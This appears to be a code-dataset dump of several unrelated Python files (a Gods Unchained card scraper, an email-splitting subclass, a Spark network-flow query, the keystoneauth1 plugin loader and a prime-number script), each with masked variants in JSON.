df1['address'][j\n ] + '&perPage=150000'\n print(url1)\n response = requests.request('GET', url1)\n data = response.json()\n number_cards = data['total']\n if number_cards != 0:\n for i in range(0, number_cards):\n user.append(data['records'][i]['user'])\n proto.append(data['records'][i]['proto'])\n url2 = 'https://api.godsunchained.com/v0/proto/' + str(proto[i])\n purity.append(data['records'][i]['purity'])\n dict = {'user': user, 'proto_number': proto, 'purity': purity}\n df = pd.DataFrame(dict)\n path = 'C:\\\\Users\\\\...'\n df.to_csv(os.path.join(path, str(user[0]) + '.csv'), index=False)\n", "step-5": "import requests\r\nimport time\r\nimport csv\r\nimport os\r\nimport pandas as pd\r\n\r\ncol_list1 = [\"cardtype\",\"username_opensea\", \"address\", \"username_game\"]\r\ndf1 = pd.read_csv(\"profiles.csv\", usecols=col_list1)\r\n\r\n\r\n\r\n#\r\nfor j in range(0,len(df1) ): #usernames in opensea\r\n print(j)\r\n user=[]\r\n proto=[]\r\n purity=[]\r\n card_name=[]\r\n card_effect=[]\r\n god=[]\r\n rarity=[]\r\n mana=[]\r\n type=[]\r\n set=[]\r\n\r\n print(df1['address'][j])\r\n\r\n url1 = \"https://api.godsunchained.com/v0/card?user=\"+df1['address'][j]+\"&perPage=150000\"\r\n print (url1)\r\n response = requests.request(\"GET\", url1)\r\n data = response.json()\r\n\r\n\r\n number_cards=data['total']\r\n if number_cards!=0:\r\n for i in range(0, number_cards):\r\n user.append(data['records'][i]['user'])\r\n proto.append(data['records'][i]['proto'])\r\n url2 = \"https://api.godsunchained.com/v0/proto/\" + str(proto[i])\r\n \r\n purity.append(data['records'][i]['purity'])\r\n \r\n # response2 = requests.request(\"GET\", url2)\r\n # data2 = response2.json()\r\n \r\n # if data2['name']!=None:\r\n # card_name.append(data2['name'])\r\n # card_effect.append(data2['effect'])\r\n # god.append(data2['god'])\r\n # rarity.append(data2['rarity'])\r\n # mana.append(data2['god'])\r\n # type.append(data2['type'])\r\n # set.append(data2['set'])\r\n # else:\r\n # card_name.append(None)\r\n # card_effect.append(None)\r\n # god.append(None)\r\n # rarity.append(None)\r\n # mana.append(None)\r\n # type.append(None)\r\n # set.append(None)\r\n \r\n \r\n dict={\r\n 'user': user,\r\n 'proto_number': proto,\r\n # 'card_name':card_name,\r\n 'purity': purity,\r\n # 'card_effect': card_effect,\r\n # 'god':god,\r\n # 'rarity':rarity,\r\n # 'mana': mana,\r\n # 'type': type,\r\n # 'set': set\r\n }\r\n \r\n df = pd.DataFrame(dict)\r\n \r\n path = 'C:\\\\Users\\\\...'\r\n df.to_csv(os.path.join(path, str(user[0]) + \".csv\"), index=False)\r\n\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from Task2.src.EmailInterpreter import EmailInterpreter import os # Part B: # ------- # Write a child-class of the previously written base class, which # implements the 'split_file' function, simply by treating each line as a # unit (it returns the list of lines). class LineBreaker(EmailInterpreter): def split_file(self, file_name): with open(os.path.join(self.directory_path, file_name), 'r') as file: lines = file.readlines() return lines
normal
{ "blob_id": "1c6077d965f5bc8c03344b53d11851f5cd50bca8", "index": 3346, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n", "step-4": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n", "step-5": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n# Part B:\n# -------\n# Write a child-class of the previously written base class, which\n# implements the 'split_file' function, simply by treating each line as a\n# unit (it returns the list of lines).\nclass LineBreaker(EmailInterpreter):\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Simple read based on the py _sql context from pyspark.sql import SQLContext sqlContext = SQLContext(sc) flow_data = sc._jvm.com.tetration.apps.IO.read(sqlContext._ssql_ctx, "/tetration/flows/", "PARQUET", "LASTHOUR") flow_data.registerTempTable("flowtab") # show the unique src_address and dst_address pairs df = sqlContext.sql("select src_address, dst_address from flowtab where dst_address like '10.66.239.%' group by src_address, dst_address order by dst_address") df.show(1000) # show the unique dst_addresses df = sqlContext.sql("select dst_address from flowtab where dst_address like '10.66.239.%' group by dst_address order by dst_address") df.show(1000) # show the sum of fwd_bytes of each dst_address dstIPs = df.rdd.map(lambda p: "" + p.dst_address).collect() for dstip in dstIPs: sql = "select src_address, dst_address, sum(fwd_bytes) from flowtab where dst_address like \'" + dstip + "\' group by src_address, dst_address" print(sql) sqlContext.sql(sql).show()
normal
{ "blob_id": "691075aa5c629e2d0c486ec288cd39bc142cdc7a", "index": 3448, "step-1": "<mask token>\n", "step-2": "<mask token>\nflow_data.registerTempTable('flowtab')\n<mask token>\ndf.show(1000)\n<mask token>\ndf.show(1000)\n<mask token>\nfor dstip in dstIPs:\n sql = (\n \"select src_address, dst_address, sum(fwd_bytes) from flowtab where dst_address like '\"\n + dstip + \"' group by src_address, dst_address\")\n print(sql)\n sqlContext.sql(sql).show()\n", "step-3": "<mask token>\nsqlContext = SQLContext(sc)\nflow_data = sc._jvm.com.tetration.apps.IO.read(sqlContext._ssql_ctx,\n '/tetration/flows/', 'PARQUET', 'LASTHOUR')\nflow_data.registerTempTable('flowtab')\ndf = sqlContext.sql(\n \"select src_address, dst_address from flowtab where dst_address like '10.66.239.%' group by src_address, dst_address order by dst_address\"\n )\ndf.show(1000)\ndf = sqlContext.sql(\n \"select dst_address from flowtab where dst_address like '10.66.239.%' group by dst_address order by dst_address\"\n )\ndf.show(1000)\ndstIPs = df.rdd.map(lambda p: '' + p.dst_address).collect()\nfor dstip in dstIPs:\n sql = (\n \"select src_address, dst_address, sum(fwd_bytes) from flowtab where dst_address like '\"\n + dstip + \"' group by src_address, dst_address\")\n print(sql)\n sqlContext.sql(sql).show()\n", "step-4": "from pyspark.sql import SQLContext\nsqlContext = SQLContext(sc)\nflow_data = sc._jvm.com.tetration.apps.IO.read(sqlContext._ssql_ctx,\n '/tetration/flows/', 'PARQUET', 'LASTHOUR')\nflow_data.registerTempTable('flowtab')\ndf = sqlContext.sql(\n \"select src_address, dst_address from flowtab where dst_address like '10.66.239.%' group by src_address, dst_address order by dst_address\"\n )\ndf.show(1000)\ndf = sqlContext.sql(\n \"select dst_address from flowtab where dst_address like '10.66.239.%' group by dst_address order by dst_address\"\n )\ndf.show(1000)\ndstIPs = df.rdd.map(lambda p: '' + p.dst_address).collect()\nfor dstip in dstIPs:\n sql = (\n \"select src_address, dst_address, sum(fwd_bytes) from flowtab where dst_address like '\"\n + dstip + \"' group by src_address, dst_address\")\n print(sql)\n sqlContext.sql(sql).show()\n", "step-5": "# Simple read based on the py _sql context\nfrom pyspark.sql import SQLContext\nsqlContext = SQLContext(sc)\n\n\nflow_data = sc._jvm.com.tetration.apps.IO.read(sqlContext._ssql_ctx, \"/tetration/flows/\", \"PARQUET\", \"LASTHOUR\")\nflow_data.registerTempTable(\"flowtab\")\n\n# show the unique src_address and dst_address pairs\ndf = sqlContext.sql(\"select src_address, dst_address from flowtab where dst_address like '10.66.239.%' group by src_address, dst_address order by dst_address\")\ndf.show(1000)\n\n# show the unique dst_addresses\ndf = sqlContext.sql(\"select dst_address from flowtab where dst_address like '10.66.239.%' group by dst_address order by dst_address\")\ndf.show(1000)\n\n# show the sum of fwd_bytes of each dst_address\ndstIPs = df.rdd.map(lambda p: \"\" + p.dst_address).collect()\nfor dstip in dstIPs:\n sql = \"select src_address, dst_address, sum(fwd_bytes) from flowtab where dst_address like \\'\" + dstip + \"\\' group by src_address, dst_address\"\n print(sql)\n sqlContext.sql(sql).show()\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import stevedore from keystoneauth1 import exceptions PLUGIN_NAMESPACE = 'keystoneauth1.plugin' __all__ = ('get_available_plugin_names', 'get_available_plugin_loaders', 'get_plugin_loader', 'get_plugin_options', 'BaseLoader', 'PLUGIN_NAMESPACE') def _auth_plugin_available(ext): """Read the value of available for whether to load this plugin.""" return ext.obj.available def get_available_plugin_names(): """Get the names of all the plugins that are available on the system. This is particularly useful for help and error text to prompt a user for example what plugins they may specify. :returns: A list of names. :rtype: frozenset """ mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE, check_func=_auth_plugin_available, invoke_on_load=True, propagate_map_exceptions=True) return frozenset(mgr.names()) def get_available_plugin_loaders(): """Retrieve all the plugin classes available on the system. :returns: A dict with plugin entrypoint name as the key and the plugin loader as the value. :rtype: dict """ mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE, check_func=_auth_plugin_available, invoke_on_load=True, propagate_map_exceptions=True) return dict(mgr.map(lambda ext: (ext.entry_point.name, ext.obj))) def get_plugin_loader(name): """Retrieve a plugin class by its entrypoint name. :param str name: The name of the object to get. :returns: An auth plugin class. :rtype: :py:class:`keystoneauth1.loading.BaseLoader` :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin: if a plugin cannot be created. """ try: mgr = stevedore.DriverManager(namespace=PLUGIN_NAMESPACE, invoke_on_load=True, name=name) except RuntimeError: raise exceptions.NoMatchingPlugin(name) return mgr.driver def get_plugin_options(name): """Get the options for a specific plugin. This will be the list of options that is registered and loaded by the specified plugin. :returns: A list of :py:class:`keystoneauth1.loading.Opt` options. :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin: if a plugin cannot be created. """ return get_plugin_loader(name).get_options() class BaseLoader(metaclass=abc.ABCMeta): @property def plugin_class(self): raise NotImplementedError() def create_plugin(self, **kwargs): """Create a plugin from the options available for the loader. Given the options that were specified by the loader create an appropriate plugin. You can override this function in your loader. This used to be specified by providing the plugin_class property and this is still supported, however specifying a property didn't let you choose a plugin type based upon the options that were presented. Override this function if you wish to return different plugins based on the options presented, otherwise you can simply provide the plugin_class property. Added 2.9 """ return self.plugin_class(**kwargs) @abc.abstractmethod def get_options(self): """Return the list of parameters associated with the auth plugin. This list may be used to generate CLI or config arguments. :returns: A list of Param objects describing available plugin parameters. :rtype: list """ return [] @property def available(self): """Return if the plugin is available for loading. If a plugin is missing dependencies or for some other reason should not be available to the current system it should override this property and return False to exclude itself from the plugin list. :rtype: bool """ return True def load_from_options(self, **kwargs): """Create a plugin from the arguments retrieved from get_options. A client can override this function to do argument validation or to handle differences between the registered options and what is required to create the plugin. """ missing_required = [o for o in self.get_options() if o.required and kwargs.get(o.dest) is None] if missing_required: raise exceptions.MissingRequiredOptions(missing_required) return self.create_plugin(**kwargs) def load_from_options_getter(self, getter, **kwargs): """Load a plugin from getter function that returns appropriate values. To handle cases other than the provided CONF and CLI loading you can specify a custom loader function that will be queried for the option value. The getter is a function that takes a :py:class:`keystoneauth1.loading.Opt` and returns a value to load with. :param getter: A function that returns a value for the given opt. :type getter: callable :returns: An authentication Plugin. :rtype: :py:class:`keystoneauth1.plugin.BaseAuthPlugin` """ for opt in (o for o in self.get_options() if o.dest not in kwargs): val = getter(opt) if val is not None: val = opt.type(val) kwargs[opt.dest] = val return self.load_from_options(**kwargs)
normal
{ "blob_id": "53127de883fb5da3214d13904664566269becba6", "index": 3570, "step-1": "<mask token>\n\n\nclass BaseLoader(metaclass=abc.ABCMeta):\n\n @property\n def plugin_class(self):\n raise NotImplementedError()\n <mask token>\n\n @abc.abstractmethod\n def get_options(self):\n \"\"\"Return the list of parameters associated with the auth plugin.\n\n This list may be used to generate CLI or config arguments.\n\n :returns: A list of Param objects describing available plugin\n parameters.\n :rtype: list\n \"\"\"\n return []\n <mask token>\n\n def load_from_options(self, **kwargs):\n \"\"\"Create a plugin from the arguments retrieved from get_options.\n\n A client can override this function to do argument validation or to\n handle differences between the registered options and what is required\n to create the plugin.\n \"\"\"\n missing_required = [o for o in self.get_options() if o.required and\n kwargs.get(o.dest) is None]\n if missing_required:\n raise exceptions.MissingRequiredOptions(missing_required)\n return self.create_plugin(**kwargs)\n <mask token>\n", "step-2": "<mask token>\n\n\ndef _auth_plugin_available(ext):\n \"\"\"Read the value of available for whether to load this plugin.\"\"\"\n return ext.obj.available\n\n\n<mask token>\n\n\ndef get_available_plugin_loaders():\n \"\"\"Retrieve all the plugin classes available on the system.\n\n :returns: A dict with plugin entrypoint name as the key and the plugin\n loader as the value.\n :rtype: dict\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available, invoke_on_load=True,\n propagate_map_exceptions=True)\n return dict(mgr.map(lambda ext: (ext.entry_point.name, ext.obj)))\n\n\ndef get_plugin_loader(name):\n \"\"\"Retrieve a plugin class by its entrypoint name.\n\n :param str name: The name of the object to get.\n\n :returns: An auth plugin class.\n :rtype: :py:class:`keystoneauth1.loading.BaseLoader`\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n try:\n mgr = stevedore.DriverManager(namespace=PLUGIN_NAMESPACE,\n invoke_on_load=True, name=name)\n except RuntimeError:\n raise exceptions.NoMatchingPlugin(name)\n return mgr.driver\n\n\ndef get_plugin_options(name):\n \"\"\"Get the options for a specific plugin.\n\n This will be the list of options that is registered and loaded by the\n specified plugin.\n\n :returns: A list of :py:class:`keystoneauth1.loading.Opt` options.\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n return get_plugin_loader(name).get_options()\n\n\nclass BaseLoader(metaclass=abc.ABCMeta):\n\n @property\n def plugin_class(self):\n raise NotImplementedError()\n\n def create_plugin(self, **kwargs):\n \"\"\"Create a plugin from the options available for the loader.\n\n Given the options that were specified by the loader create an\n appropriate plugin. You can override this function in your loader.\n\n This used to be specified by providing the plugin_class property and\n this is still supported, however specifying a property didn't let you\n choose a plugin type based upon the options that were presented.\n\n Override this function if you wish to return different plugins based on\n the options presented, otherwise you can simply provide the\n plugin_class property.\n\n Added 2.9\n \"\"\"\n return self.plugin_class(**kwargs)\n\n @abc.abstractmethod\n def get_options(self):\n \"\"\"Return the list of parameters associated with the auth plugin.\n\n This list may be used to generate CLI or config arguments.\n\n :returns: A list of Param objects describing available plugin\n parameters.\n :rtype: list\n \"\"\"\n return []\n\n @property\n def available(self):\n \"\"\"Return if the plugin is available for loading.\n\n If a plugin is missing dependencies or for some other reason should not\n be available to the current system it should override this property and\n return False to exclude itself from the plugin list.\n\n :rtype: bool\n \"\"\"\n return True\n\n def load_from_options(self, **kwargs):\n \"\"\"Create a plugin from the arguments retrieved from get_options.\n\n A client can override this function to do argument validation or to\n handle differences between the registered options and what is required\n to create the plugin.\n \"\"\"\n missing_required = [o for o in self.get_options() if o.required and\n kwargs.get(o.dest) is None]\n if missing_required:\n raise exceptions.MissingRequiredOptions(missing_required)\n return self.create_plugin(**kwargs)\n\n def load_from_options_getter(self, getter, **kwargs):\n \"\"\"Load a plugin from getter function that returns appropriate values.\n\n To handle cases other than the provided CONF and CLI loading you can\n specify a custom loader function that will be queried for the option\n value.\n The getter is a function that takes a\n :py:class:`keystoneauth1.loading.Opt` and returns a value to load with.\n\n :param getter: A function that returns a value for the given opt.\n :type getter: callable\n\n :returns: An authentication Plugin.\n :rtype: :py:class:`keystoneauth1.plugin.BaseAuthPlugin`\n \"\"\"\n for opt in (o for o in self.get_options() if o.dest not in kwargs):\n val = getter(opt)\n if val is not None:\n val = opt.type(val)\n kwargs[opt.dest] = val\n return self.load_from_options(**kwargs)\n", "step-3": "<mask token>\nPLUGIN_NAMESPACE = 'keystoneauth1.plugin'\n__all__ = ('get_available_plugin_names', 'get_available_plugin_loaders',\n 'get_plugin_loader', 'get_plugin_options', 'BaseLoader', 'PLUGIN_NAMESPACE'\n )\n\n\ndef _auth_plugin_available(ext):\n \"\"\"Read the value of available for whether to load this plugin.\"\"\"\n return ext.obj.available\n\n\ndef get_available_plugin_names():\n \"\"\"Get the names of all the plugins that are available on the system.\n\n This is particularly useful for help and error text to prompt a user for\n example what plugins they may specify.\n\n :returns: A list of names.\n :rtype: frozenset\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available, invoke_on_load=True,\n propagate_map_exceptions=True)\n return frozenset(mgr.names())\n\n\ndef get_available_plugin_loaders():\n \"\"\"Retrieve all the plugin classes available on the system.\n\n :returns: A dict with plugin entrypoint name as the key and the plugin\n loader as the value.\n :rtype: dict\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available, invoke_on_load=True,\n propagate_map_exceptions=True)\n return dict(mgr.map(lambda ext: (ext.entry_point.name, ext.obj)))\n\n\ndef get_plugin_loader(name):\n \"\"\"Retrieve a plugin class by its entrypoint name.\n\n :param str name: The name of the object to get.\n\n :returns: An auth plugin class.\n :rtype: :py:class:`keystoneauth1.loading.BaseLoader`\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n try:\n mgr = stevedore.DriverManager(namespace=PLUGIN_NAMESPACE,\n invoke_on_load=True, name=name)\n except RuntimeError:\n raise exceptions.NoMatchingPlugin(name)\n return mgr.driver\n\n\ndef get_plugin_options(name):\n \"\"\"Get the options for a specific plugin.\n\n This will be the list of options that is registered and loaded by the\n specified plugin.\n\n :returns: A list of :py:class:`keystoneauth1.loading.Opt` options.\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n return get_plugin_loader(name).get_options()\n\n\nclass BaseLoader(metaclass=abc.ABCMeta):\n\n @property\n def plugin_class(self):\n raise NotImplementedError()\n\n def create_plugin(self, **kwargs):\n \"\"\"Create a plugin from the options available for the loader.\n\n Given the options that were specified by the loader create an\n appropriate plugin. You can override this function in your loader.\n\n This used to be specified by providing the plugin_class property and\n this is still supported, however specifying a property didn't let you\n choose a plugin type based upon the options that were presented.\n\n Override this function if you wish to return different plugins based on\n the options presented, otherwise you can simply provide the\n plugin_class property.\n\n Added 2.9\n \"\"\"\n return self.plugin_class(**kwargs)\n\n @abc.abstractmethod\n def get_options(self):\n \"\"\"Return the list of parameters associated with the auth plugin.\n\n This list may be used to generate CLI or config arguments.\n\n :returns: A list of Param objects describing available plugin\n parameters.\n :rtype: list\n \"\"\"\n return []\n\n @property\n def available(self):\n \"\"\"Return if the plugin is available for loading.\n\n If a plugin is missing dependencies or for some other reason should not\n be available to the current system it should override this property and\n return False to exclude itself from the plugin list.\n\n :rtype: bool\n \"\"\"\n return True\n\n def load_from_options(self, **kwargs):\n \"\"\"Create a plugin from the arguments retrieved from get_options.\n\n A client can override this function to do argument validation or to\n handle differences between the registered options and what is required\n to create the plugin.\n \"\"\"\n missing_required = [o for o in self.get_options() if o.required and\n kwargs.get(o.dest) is None]\n if missing_required:\n raise exceptions.MissingRequiredOptions(missing_required)\n return self.create_plugin(**kwargs)\n\n def load_from_options_getter(self, getter, **kwargs):\n \"\"\"Load a plugin from getter function that returns appropriate values.\n\n To handle cases other than the provided CONF and CLI loading you can\n specify a custom loader function that will be queried for the option\n value.\n The getter is a function that takes a\n :py:class:`keystoneauth1.loading.Opt` and returns a value to load with.\n\n :param getter: A function that returns a value for the given opt.\n :type getter: callable\n\n :returns: An authentication Plugin.\n :rtype: :py:class:`keystoneauth1.plugin.BaseAuthPlugin`\n \"\"\"\n for opt in (o for o in self.get_options() if o.dest not in kwargs):\n val = getter(opt)\n if val is not None:\n val = opt.type(val)\n kwargs[opt.dest] = val\n return self.load_from_options(**kwargs)\n", "step-4": "import abc\nimport stevedore\nfrom keystoneauth1 import exceptions\nPLUGIN_NAMESPACE = 'keystoneauth1.plugin'\n__all__ = ('get_available_plugin_names', 'get_available_plugin_loaders',\n 'get_plugin_loader', 'get_plugin_options', 'BaseLoader', 'PLUGIN_NAMESPACE'\n )\n\n\ndef _auth_plugin_available(ext):\n \"\"\"Read the value of available for whether to load this plugin.\"\"\"\n return ext.obj.available\n\n\ndef get_available_plugin_names():\n \"\"\"Get the names of all the plugins that are available on the system.\n\n This is particularly useful for help and error text to prompt a user for\n example what plugins they may specify.\n\n :returns: A list of names.\n :rtype: frozenset\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available, invoke_on_load=True,\n propagate_map_exceptions=True)\n return frozenset(mgr.names())\n\n\ndef get_available_plugin_loaders():\n \"\"\"Retrieve all the plugin classes available on the system.\n\n :returns: A dict with plugin entrypoint name as the key and the plugin\n loader as the value.\n :rtype: dict\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available, invoke_on_load=True,\n propagate_map_exceptions=True)\n return dict(mgr.map(lambda ext: (ext.entry_point.name, ext.obj)))\n\n\ndef get_plugin_loader(name):\n \"\"\"Retrieve a plugin class by its entrypoint name.\n\n :param str name: The name of the object to get.\n\n :returns: An auth plugin class.\n :rtype: :py:class:`keystoneauth1.loading.BaseLoader`\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n try:\n mgr = stevedore.DriverManager(namespace=PLUGIN_NAMESPACE,\n invoke_on_load=True, name=name)\n except RuntimeError:\n raise exceptions.NoMatchingPlugin(name)\n return mgr.driver\n\n\ndef get_plugin_options(name):\n \"\"\"Get the options for a specific plugin.\n\n This will be the list of options that is registered and loaded by the\n specified plugin.\n\n :returns: A list of :py:class:`keystoneauth1.loading.Opt` options.\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n return get_plugin_loader(name).get_options()\n\n\nclass BaseLoader(metaclass=abc.ABCMeta):\n\n @property\n def plugin_class(self):\n raise NotImplementedError()\n\n def create_plugin(self, **kwargs):\n \"\"\"Create a plugin from the options available for the loader.\n\n Given the options that were specified by the loader create an\n appropriate plugin. You can override this function in your loader.\n\n This used to be specified by providing the plugin_class property and\n this is still supported, however specifying a property didn't let you\n choose a plugin type based upon the options that were presented.\n\n Override this function if you wish to return different plugins based on\n the options presented, otherwise you can simply provide the\n plugin_class property.\n\n Added 2.9\n \"\"\"\n return self.plugin_class(**kwargs)\n\n @abc.abstractmethod\n def get_options(self):\n \"\"\"Return the list of parameters associated with the auth plugin.\n\n This list may be used to generate CLI or config arguments.\n\n :returns: A list of Param objects describing available plugin\n parameters.\n :rtype: list\n \"\"\"\n return []\n\n @property\n def available(self):\n \"\"\"Return if the plugin is available for loading.\n\n If a plugin is missing dependencies or for some other reason should not\n be available to the current system it should override this property and\n return False to exclude itself from the plugin list.\n\n :rtype: bool\n \"\"\"\n return True\n\n def load_from_options(self, **kwargs):\n \"\"\"Create a plugin from the arguments retrieved from get_options.\n\n A client can override this function to do argument validation or to\n handle differences between the registered options and what is required\n to create the plugin.\n \"\"\"\n missing_required = [o for o in self.get_options() if o.required and\n kwargs.get(o.dest) is None]\n if missing_required:\n raise exceptions.MissingRequiredOptions(missing_required)\n return self.create_plugin(**kwargs)\n\n def load_from_options_getter(self, getter, **kwargs):\n \"\"\"Load a plugin from getter function that returns appropriate values.\n\n To handle cases other than the provided CONF and CLI loading you can\n specify a custom loader function that will be queried for the option\n value.\n The getter is a function that takes a\n :py:class:`keystoneauth1.loading.Opt` and returns a value to load with.\n\n :param getter: A function that returns a value for the given opt.\n :type getter: callable\n\n :returns: An authentication Plugin.\n :rtype: :py:class:`keystoneauth1.plugin.BaseAuthPlugin`\n \"\"\"\n for opt in (o for o in self.get_options() if o.dest not in kwargs):\n val = getter(opt)\n if val is not None:\n val = opt.type(val)\n kwargs[opt.dest] = val\n return self.load_from_options(**kwargs)\n", "step-5": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport abc\n\nimport stevedore\n\nfrom keystoneauth1 import exceptions\n\nPLUGIN_NAMESPACE = 'keystoneauth1.plugin'\n\n\n__all__ = ('get_available_plugin_names',\n 'get_available_plugin_loaders',\n 'get_plugin_loader',\n 'get_plugin_options',\n 'BaseLoader',\n 'PLUGIN_NAMESPACE')\n\n\ndef _auth_plugin_available(ext):\n \"\"\"Read the value of available for whether to load this plugin.\"\"\"\n return ext.obj.available\n\n\ndef get_available_plugin_names():\n \"\"\"Get the names of all the plugins that are available on the system.\n\n This is particularly useful for help and error text to prompt a user for\n example what plugins they may specify.\n\n :returns: A list of names.\n :rtype: frozenset\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available,\n invoke_on_load=True,\n propagate_map_exceptions=True)\n return frozenset(mgr.names())\n\n\ndef get_available_plugin_loaders():\n \"\"\"Retrieve all the plugin classes available on the system.\n\n :returns: A dict with plugin entrypoint name as the key and the plugin\n loader as the value.\n :rtype: dict\n \"\"\"\n mgr = stevedore.EnabledExtensionManager(namespace=PLUGIN_NAMESPACE,\n check_func=_auth_plugin_available,\n invoke_on_load=True,\n propagate_map_exceptions=True)\n\n return dict(mgr.map(lambda ext: (ext.entry_point.name, ext.obj)))\n\n\ndef get_plugin_loader(name):\n \"\"\"Retrieve a plugin class by its entrypoint name.\n\n :param str name: The name of the object to get.\n\n :returns: An auth plugin class.\n :rtype: :py:class:`keystoneauth1.loading.BaseLoader`\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n try:\n mgr = stevedore.DriverManager(namespace=PLUGIN_NAMESPACE,\n invoke_on_load=True,\n name=name)\n except RuntimeError:\n raise exceptions.NoMatchingPlugin(name)\n\n return mgr.driver\n\n\ndef get_plugin_options(name):\n \"\"\"Get the options for a specific plugin.\n\n This will be the list of options that is registered and loaded by the\n specified plugin.\n\n :returns: A list of :py:class:`keystoneauth1.loading.Opt` options.\n\n :raises keystoneauth1.exceptions.auth_plugins.NoMatchingPlugin:\n if a plugin cannot be created.\n \"\"\"\n return get_plugin_loader(name).get_options()\n\n\nclass BaseLoader(metaclass=abc.ABCMeta):\n\n @property\n def plugin_class(self):\n raise NotImplementedError()\n\n def create_plugin(self, **kwargs):\n \"\"\"Create a plugin from the options available for the loader.\n\n Given the options that were specified by the loader create an\n appropriate plugin. You can override this function in your loader.\n\n This used to be specified by providing the plugin_class property and\n this is still supported, however specifying a property didn't let you\n choose a plugin type based upon the options that were presented.\n\n Override this function if you wish to return different plugins based on\n the options presented, otherwise you can simply provide the\n plugin_class property.\n\n Added 2.9\n \"\"\"\n return self.plugin_class(**kwargs)\n\n @abc.abstractmethod\n def get_options(self):\n \"\"\"Return the list of parameters associated with the auth plugin.\n\n This list may be used to generate CLI or config arguments.\n\n :returns: A list of Param objects describing available plugin\n parameters.\n :rtype: list\n \"\"\"\n return []\n\n @property\n def available(self):\n \"\"\"Return if the plugin is available for loading.\n\n If a plugin is missing dependencies or for some other reason should not\n be available to the current system it should override this property and\n return False to exclude itself from the plugin list.\n\n :rtype: bool\n \"\"\"\n return True\n\n def load_from_options(self, **kwargs):\n \"\"\"Create a plugin from the arguments retrieved from get_options.\n\n A client can override this function to do argument validation or to\n handle differences between the registered options and what is required\n to create the plugin.\n \"\"\"\n missing_required = [o for o in self.get_options()\n if o.required and kwargs.get(o.dest) is None]\n\n if missing_required:\n raise exceptions.MissingRequiredOptions(missing_required)\n\n return self.create_plugin(**kwargs)\n\n def load_from_options_getter(self, getter, **kwargs):\n \"\"\"Load a plugin from getter function that returns appropriate values.\n\n To handle cases other than the provided CONF and CLI loading you can\n specify a custom loader function that will be queried for the option\n value.\n The getter is a function that takes a\n :py:class:`keystoneauth1.loading.Opt` and returns a value to load with.\n\n :param getter: A function that returns a value for the given opt.\n :type getter: callable\n\n :returns: An authentication Plugin.\n :rtype: :py:class:`keystoneauth1.plugin.BaseAuthPlugin`\n \"\"\"\n for opt in (o for o in self.get_options() if o.dest not in kwargs):\n val = getter(opt)\n if val is not None:\n val = opt.type(val)\n kwargs[opt.dest] = val\n\n return self.load_from_options(**kwargs)\n", "step-ids": [ 4, 11, 13, 14, 15 ] }
[ 4, 11, 13, 14, 15 ]
# What is the 10 001st prime number? primes = [2] def is_prime(a, primes): b = a for x in primes: d, m = divmod(b, x) if m == 0: return False else: return True a = 3 while len(primes) <= 10001: # There's something faster than just checking all of them, but this # will do for now. if is_prime(a, primes): primes.append(a) print a a += 1 print primes[10000]
normal
